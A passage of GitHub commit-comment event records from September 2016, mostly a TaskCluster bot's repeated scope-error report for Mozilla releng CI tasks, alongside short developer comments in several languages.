{"id":"4608061053","type":"CommitCommentEvent","actor":{"login":"thaipeace"},"repo":{"name":"thaipeace/htn"},"payload":{"comment":{"id":19144903,"position":40,"line":198,"path":"modules/custom/htn/css/nghia.css","commit_id":"4e29c0e65957c54b5ff7424c67ce18c1f064aa4e","created_at":"2016-09-23T11:39:02Z","updated_at":"2016-09-23T11:39:02Z","body":"thêm id của form"}},"created_at":"2016-09-23T11:39:02Z"}
{"id":"4608061548","type":"CommitCommentEvent","actor":{"login":"thaipeace"},"repo":{"name":"thaipeace/htn"},"payload":{"comment":{"id":19144906,"position":54,"line":212,"path":"modules/custom/htn/css/nghia.css","commit_id":"4e29c0e65957c54b5ff7424c67ce18c1f064aa4e","created_at":"2016-09-23T11:39:11Z","updated_at":"2016-09-23T11:39:11Z","body":"thêm id của form"}},"created_at":"2016-09-23T11:39:11Z"}
{"id":"4608068957","type":"CommitCommentEvent","actor":{"login":"visitek"},"repo":{"name":"myappin/ng2-datetime-picker"},"payload":{"comment":{"id":19144926,"position":null,"line":null,"path":null,"commit_id":"8693f185778b8c0bdf2b05f45f82fea867906565","created_at":"2016-09-23T11:41:01Z","updated_at":"2016-09-23T11:41:01Z","body":"Works now for Model and Template driven forms. Reacts interactive to model change on the go"}},"created_at":"2016-09-23T11:41:01Z"}
{"id":"4608072958","type":"CommitCommentEvent","actor":{"login":"dawnsmell"},"repo":{"name":"dawnsmell/ReviewTest"},"payload":{"comment":{"id":19144945,"position":191,"line":191,"path":"UnitHomming.cs","commit_id":"9b79a7a1ad2ec4fee8279346fbbe4c3c2913cfb9","created_at":"2016-09-23T11:42:03Z","updated_at":"2016-09-23T11:42:03Z","body":"`+\t\t\tcount = crPath.Count;\r\n +\t\t\tfloat startMovetime = m_ShotStartTime / ( detail * m_ShotNodePos.Count + 1 );\r\n +\t\t\tfloat checkTime = 0;\r\n +\t\t\tfor( int i = 0; i < (int)( detail * 1.1f ); )\r\n +\t\t\t{\r\n +\t\t\t\tcheckTime += Time.deltaTime;\r\n +\t\t\t\tfloat value = checkTime / startMovetime;\r\n +\t\t\t\tint nowIndex = (int)( value );\r\n +\t\t\t\tvalue -= nowIndex;\r\n +\t\t\t\tVector3 nowP = crPath[ nowIndex ];\r\n +\t\t\t\tVector3 nextP = crPath[ nowIndex + 1 ];\r\n +\r\n +\t\t\t\ttransform.position = Vector3.Lerp( nowP, nextP, value );\r\n +\t\t\t\ttransform.LookAt( nextP );\r\n +\t\t\t\ti = nowIndex;\r\n +\t\t\t\t//yield return new WaitForEndOfFrame();\r\n +\t\t\t\tyield return Yielders.EndOfFrame;\r\n +\t\t\t}\r\n`\r\n위 코드 설명 좀 부탁 드립니다."}},"created_at":"2016-09-23T11:42:03Z"}
{"id":"4608075040","type":"CommitCommentEvent","actor":{"login":"ikselll"},"repo":{"name":"pixers/salesmanago-api"},"payload":{"comment":{"id":19144947,"position":35,"line":43,"path":"src/Pixers/SalesManagoAPI/Service/ContactService.php","commit_id":"9eca21d042eba40e1c20eca3ab4d93366e9c5605","created_at":"2016-09-23T11:42:35Z","updated_at":"2016-09-23T11:42:35Z","body":"You are right (it's only wrong comment issue). Thanks!"}},"created_at":"2016-09-23T11:42:35Z"}
{"id":"4608076581","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19144958,"position":null,"line":null,"path":null,"commit_id":"17a42239c28547f5645a774e3d70fa5c58811783","created_at":"2016-09-23T11:43:00Z","updated_at":"2016-09-23T11:43:00Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:project/releng/services/master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:project/releng/services/master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"GFjepDc7Tyyp_whfgDeLXg\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_frontend\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:project/releng/services/master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/project/releng/services/master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"cfa14912f2f079b64808b6fefe18c542ed553135\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"17a42239c28547f5645a774e3d70fa5c58811783\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T11:42:59.955Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T11:42:59.955Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"T9H_iW7TR6uT5rKXEFcEzw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T11:42:59.955Z\\\"\\n}\\n  time:     2016-09-23T11:43:00.091Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:project/releng/services/master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:project/releng/services/master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:project/releng/services/master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"GFjepDc7Tyyp_whfgDeLXg\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_frontend\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:project/releng/services/master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/project/releng/services/master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"cfa14912f2f079b64808b6fefe18c542ed553135\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"17a42239c28547f5645a774e3d70fa5c58811783\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T11:42:59.955Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T11:42:59.955Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"T9H_iW7TR6uT5rKXEFcEzw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T11:42:59.955Z\\\"\\n}\\n  time:     2016-09-23T11:43:00.091Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:project/releng/services/master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"GFjepDc7Tyyp_whfgDeLXg\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"shipit_frontend\",\n                        \"description\": \"Test, build and deploy shipit_frontend\",\n                        \"owner\": \"rok@garbas.si\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:project/releng/services/master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"shipit_frontend\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/project/releng/services/master\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_BASE_SHA\": \"cfa14912f2f079b64808b6fefe18c542ed553135\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_HEAD_USER\": \"garbas\",\n                            \"GITHUB_HEAD_SHA\": \"17a42239c28547f5645a774e3d70fa5c58811783\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"rok@garbas.si\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T11:42:59.955Z\",\n                    \"deadline\": \"2016-09-24T11:42:59.955Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"T9H_iW7TR6uT5rKXEFcEzw\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T11:42:59.955Z\"\n                },\n                \"time\": \"2016-09-23T11:43:00.091Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:project/releng/services/master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:branch:master\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:project/releng/services/master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:project/releng/services/master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"M105Dk3GQTy4HCwHfJi3bQ\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_frontend\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:project/releng/services/master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/project/releng/services/master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"cfa14912f2f079b64808b6fefe18c542ed553135\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"17a42239c28547f5645a774e3d70fa5c58811783\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T11:42:59.951Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T11:42:59.951Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"T9H_iW7TR6uT5rKXEFcEzw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T11:42:59.951Z\\\"\\n}\\n  time:     2016-09-23T11:43:00.100Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:project/releng/services/master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:project/releng/services/master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:project/releng/services/master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"M105Dk3GQTy4HCwHfJi3bQ\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_frontend\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:project/releng/services/master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/project/releng/services/master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"cfa14912f2f079b64808b6fefe18c542ed553135\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"17a42239c28547f5645a774e3d70fa5c58811783\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T11:42:59.951Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T11:42:59.951Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"T9H_iW7TR6uT5rKXEFcEzw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T11:42:59.951Z\\\"\\n}\\n  time:     2016-09-23T11:43:00.100Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:project/releng/services/master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"M105Dk3GQTy4HCwHfJi3bQ\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_frontend\",\n                        \"description\": \"Test, build and deploy releng_frontend\",\n                        \"owner\": \"rok@garbas.si\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:project/releng/services/master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_frontend\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/project/releng/services/master\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_BASE_SHA\": \"cfa14912f2f079b64808b6fefe18c542ed553135\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_HEAD_USER\": \"garbas\",\n                            \"GITHUB_HEAD_SHA\": \"17a42239c28547f5645a774e3d70fa5c58811783\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"rok@garbas.si\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T11:42:59.951Z\",\n                    \"deadline\": \"2016-09-24T11:42:59.951Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"T9H_iW7TR6uT5rKXEFcEzw\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T11:42:59.951Z\"\n                },\n                \"time\": \"2016-09-23T11:43:00.100Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:project/releng/services/master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:branch:master\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:project/releng/services/master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:branch:master\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:project/releng/services/master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"AcKpJjqTQ2aL967W6ECClg\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_clobberer\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_clobberer\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_clobberer\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:project/releng/services/master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": 